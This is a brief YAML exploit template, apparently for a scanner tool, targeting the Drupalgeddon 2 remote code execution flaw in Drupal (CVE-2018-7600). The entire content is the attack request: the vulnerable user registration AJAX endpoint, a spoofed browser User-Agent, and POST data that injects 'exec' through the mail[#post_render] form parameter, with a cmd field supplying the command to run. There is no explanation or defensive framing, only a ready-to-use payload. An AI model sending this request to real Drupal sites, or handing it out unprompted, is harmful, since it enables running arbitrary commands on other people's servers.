# @name: exmple.yaml
# @Author: recyvan
# @Date: 2024-4-1
# @information: Drupal Drupalgeddon 2 远程代码执行漏洞（CVE-2018-7600）

poc_url:
  - url : /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax
User-Agent:
  - context: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
method:
  - method: POST
  - data: form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=
cmd:
  - cmd: 'yes'